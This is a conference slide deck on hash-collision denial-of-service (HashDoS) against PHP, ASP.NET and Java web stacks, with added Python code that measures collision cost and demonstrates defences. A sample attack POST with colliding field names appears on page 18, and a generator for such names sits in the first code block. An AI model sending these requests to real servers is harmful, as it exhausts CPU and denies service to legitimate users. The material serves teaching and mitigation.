Layer-7 DoS Hash Collisions. Provide cyber fraud protection to websites Prevent business logic...


Page 1:

Layer-7 DoS Hash Collisions

Page 2:

About Hybrid Security

Provide cyber fraud protection to websites

Prevent business logic attacks on web applications

Heuristic web user behavior analysis

Signature-free 0-day attack detection

Page 3:

Layer-7 DoS

• Slowloris: Written by RSnake, exploits slow HTTP headers

• R.U.Dead.Yet: Written by Raviv Raz, exploits slow POST fields

• Keep-Dead: Written by Esrun, exploits long Keep-Alive sessions

Page 4:

Hash DoS

• HashDoS – Advisory published by Julian Wälde & Alexander Klink, Dec. 28, 2011

• Vulnerability in ASP.NET (MS11-100)

• Vulnerability in PHP 4 and 5

• Also vulnerable: Java, Tomcat, Python, Ruby, Oracle

Page 5:

Hash Tables

(diagram: the keys login=root and passwd=123 are hashed to separate slots; label "Hash Key")

Insert, search, delete node: inserting, searching or deleting n nodes costs O(n) in total

Page 6:

Hash Collisions

(diagram: the keys EzEz=123, EzFY=123 and FYEz=123 all land in the same slot; label "Hash Key")

When h(Ez) = h(FY), every key chains behind the same slot, so inserting, searching or deleting n nodes becomes O(n²) in total

Page 7:

DJBX33A Hashing

• Daniel J. Bernstein; times 33, plus the character (the "A" stands for addition)

• Used in 32-bit PHP 5, Java Tomcat

• Similar function used in Ruby

Page 8:

Hashing With the Pigeons

(diagram: a large set of strings mapped onto a smaller set of hashes)

• Apparently, a non-injective function

• More commonly known as the pigeonhole principle

Page 9:

DJBX33X Hashing

• Daniel J. Bernstein; times 33, XOR the character (the "X" stands for XOR)

• Used in 32/64-bit PHP 4 & ASP.NET

• Similar function used in Python

Page 10:

Linear Collision Generation

h('Ey') = 31¹ · 69 + 31⁰ · 121 = 2260

h('FZ') = 31¹ · 70 + 31⁰ · 90 = 2260

h('Eya') = 31 · (31¹ · 69 + 31⁰ · 121) + 31⁰ · 97
        = 31 · (31¹ · 70 + 31⁰ · 90) + 31⁰ · 97
        = h('FZa')

Page 11:

DEMO

Page 12:

Using Binary Permutations

h('EzEz') (00)

= h('EzFY') (01)

= h('FYEz') (10)

= h('FYFY') (11)
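The Python below is an added example, not code from the deck or from Hybrid Security. It implements the hash functions the slides name (DJBX33A with PHP's 5381 seed, DJBX33X, and the multiplier-31 hash whose arithmetic slide 10 shows, which is the same formula as java.lang.String.hashCode), checks the page's two worked collisions 'Ey'/'FZ' and 'Ez'/'FY', builds the binary permutations of slide 12, and counts key comparisons in a small chained table so the O(n) versus O(n²) claim of slides 5 and 6 can be measured rather than asserted. The 32-bit mask, the 1024-bucket table and the "field000" benign names are my assumptions. It also records one thing the slides only imply: the 'Ez'/'FY' pair does not collide under the XOR variant, which is why slide 16 needs a different technique for DJBX33X.

```python
# Added example, not code from the deck: the hash functions the slides name,
# the page's two worked collisions, and the chain-walk cost in a small table.
from itertools import product
from typing import Callable, List, Tuple

MASK32 = 0xFFFFFFFF  # the deck talks about 32-bit PHP 5 / Tomcat builds


def poly_hash(s: str, mult: int, seed: int) -> int:
    """Multiplicative string hash: h = h*mult + ord(c) for each character."""
    h = seed
    for c in s:
        h = (h * mult + ord(c)) & MASK32
    return h


def djbx33a(s: str) -> int:
    """DJBX33A (32-bit PHP 5): seed 5381, times 33, plus the character."""
    return poly_hash(s, 33, 5381)


def djbx33x(s: str) -> int:
    """DJBX33X (PHP 4 / ASP.NET family): times 33, XOR the character."""
    h = 5381
    for c in s:
        h = ((h * 33) ^ ord(c)) & MASK32
    return h


def java_string_hash(s: str) -> int:
    """java.lang.String.hashCode: seed 0, times 31 (the arithmetic on slide 10)."""
    return poly_hash(s, 31, 0)


def colliding_names(pair: Tuple[str, str], blocks: int) -> List[str]:
    """Slide 12's binary permutations: with h('Ez') == h('FY') for the additive
    hash, any sequence of the two blocks hashes the same, so 2**blocks names
    collide.  Constructed here only to measure the table cost below."""
    return ["".join(p) for p in product(pair, repeat=blocks)]


class CountingChainTable:
    """Separately chained hash table that counts key comparisons on insert."""

    def __init__(self, hash_fn: Callable[[str], int], buckets: int = 1024):
        self.hash_fn = hash_fn
        self.chains: List[List[Tuple[str, str]]] = [[] for _ in range(buckets)]
        self.comparisons = 0

    def insert(self, key: str, value: str) -> None:
        chain = self.chains[self.hash_fn(key) % len(self.chains)]
        for i, (k, _) in enumerate(chain):
            self.comparisons += 1  # one string compare per node already chained
            if k == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))


def insert_cost(keys: List[str], hash_fn: Callable[[str], int] = djbx33a) -> int:
    """Key comparisons needed to insert every key (slides 5-6: O(n) vs O(n^2))."""
    table = CountingChainTable(hash_fn)
    for k in keys:
        table.insert(k, "")
    return table.comparisons


if __name__ == "__main__":
    # Slide 10 (multiplier 31) and slides 6/12 (multiplier 33) check out.
    print(java_string_hash("Ey"), java_string_hash("FZ"))          # 2260 2260
    print(java_string_hash("Eya") == java_string_hash("FZa"))       # True
    print({djbx33a(n) for n in colliding_names(("Ez", "FY"), 2)})   # {5862308...}: one value
    # The XOR variant is not fooled by the same pair (hence MITM on slide 16).
    print(djbx33x("Ez") == djbx33x("FY"))                           # False
    # 256 benign names vs 256 colliding names of the same length (16 chars).
    benign = [f"field{i:03d}" for i in range(256)]
    print(insert_cost(benign), insert_cost(colliding_names(("Ez", "FY"), 8)))
```

With 256 names that all share one full hash, every insert walks the whole existing chain, so the comparison count is exactly 256·255/2 = 32,640; the same number of ordinary names spread over 1024 buckets costs a few hundred comparisons at most. That ratio, not the per-request byte count, is what makes the slide-18 request expensive for the server.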

Page 13:

Pre-computing rainbow tables

• Calculate long permutations of colliding char pairs

• Create many same-hash field names for POST

• More advanced Meet-In-The-Middle techniques improve rainbow table creation exponentially

Page 14:

PHP 5

• DJBX33X

• 1 Gbit/s of attack traffic keeps ~10,000 i7 cores busy

• POST limited to 8 MB

• POST limited by max_input_time (default on Ubuntu/BSD = 60 seconds)

Page 15:

<?php echo $_POST["param"]; ?>

Page 16:

• DJBX33X

• Breakable using Meet-In-The-Middle

• 30 kbit/s keeps 1 Core 2 CPU busy

• With 1 Gbit/s, keeps ~30,000 Core 2 CPUs busy

Page 17:

<% Response.Write(Request.Form["param"]); %>

Page 18:

POST / HTTP/1.1
Host: victim.com
Connection: keep-alive
Content-Length: 1000000
User-Agent: Mozilla/5.0
Cookie: __utmz=181569312.1294666144.1.1

EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…
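The following Python is an added example of mine, not the deck's code, showing two server-side defences against the request above (and the size and time limits slides 14 and 16 touch on), exercised on the four field names that request shows. The first bounds the number of form fields before any of them is hashed; `urllib.parse.parse_qsl`'s `max_num_fields` argument is a real parameter (Python 3.8 and later), while the 1000-field limit is my choice, picked to match the default PHP later shipped as max_input_vars. The second replaces the bucket hash with a keyed PRF (BLAKE2b with a per-process key), which is my suggestion rather than anything on the slides. The reseeded DJBX33A in between is there to show why a random seed alone does not help an additive DJB hash: the four slide-18 names collide for every seed.

```python
# Added example, not code from the deck: two defences for the request on
# slide 18, exercised on the field names that slide shows.
import hashlib
import os
from typing import Callable, List, Tuple
from urllib.parse import parse_qsl

MASK32 = 0xFFFFFFFF

# Constructed from slide 18: the four visible field names, empty values,
# trailing "..." dropped.  "%17" decodes to the control byte 0x17.
SLIDE_BODY = ("EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&"
              "EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&")

# Hypothetical limit (PHP's later max_input_vars setting defaults to 1000).
MAX_FIELDS = 1000


def parse_form(body: str, max_fields: int = MAX_FIELDS) -> Tuple[bool, List[Tuple[str, str]]]:
    """Defence 1: bound the number of fields before any of them is hashed.
    parse_qsl's max_num_fields counts separators up front, so an oversized
    body is rejected in linear time and no table is ever built for it."""
    try:
        fields = parse_qsl(body, keep_blank_values=True, max_num_fields=max_fields)
    except ValueError:
        return False, []
    return True, fields


def seeded_djbx33a(s: bytes, seed: int) -> int:
    """DJBX33A with the 5381 seed replaced by a per-process random value.
    The hash is linear in the seed: h(s) = seed*33**len(s) + P(s) mod 2**32,
    so two same-length names with equal P(s) collide for every seed.
    Reseeding this family does not help; the slide-18 names still share a bucket."""
    h = seed
    for b in s:
        h = (h * 33 + b) & MASK32
    return h


PROCESS_KEY = os.urandom(16)  # fresh per process in real use


def keyed_hash(s: bytes, key: bytes = PROCESS_KEY) -> int:
    """Defence 2: a keyed PRF (BLAKE2b, 8-byte digest) as the bucket hash.
    Without the key, precomputed collisions say nothing about which names
    will share a bucket on this server."""
    return int.from_bytes(hashlib.blake2b(s, digest_size=8, key=key).digest(), "big")


def slide_field_names() -> List[bytes]:
    """The four field names of slide 18, as the raw bytes a hash table would see."""
    ok, fields = parse_form(SLIDE_BODY)
    assert ok
    return [name.encode("latin-1") for name, _ in fields]


def bucket_spread(names: List[bytes], hash_fn: Callable[[bytes], int]) -> int:
    """Number of distinct hash values the names produce (1 is the worst case)."""
    return len({hash_fn(n) for n in names})


if __name__ == "__main__":
    names = slide_field_names()
    print(len(names))                                                     # 4
    print(bucket_spread(names, lambda n: seeded_djbx33a(n, 5381)))       # 1
    print(bucket_spread(names, lambda n: seeded_djbx33a(n, 0x1234ABCD)))  # 1
    print(bucket_spread(names, keyed_hash))                               # 4
    huge = "&".join(f"f{i}=" for i in range(5000))
    print(parse_form(huge)[0])                                            # False
```

The field-count limit is the cheap, deployable fix for a platform whose hash function cannot be changed; the keyed hash is the structural fix, and the reseeded variant is included as a warning that "randomise the seed" is not the same thing as "use a keyed hash" when the underlying function is linear.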

Page 19:

PoC already in the wild

Page 20:

Thank You

[email protected]
http://www.hybridsec.com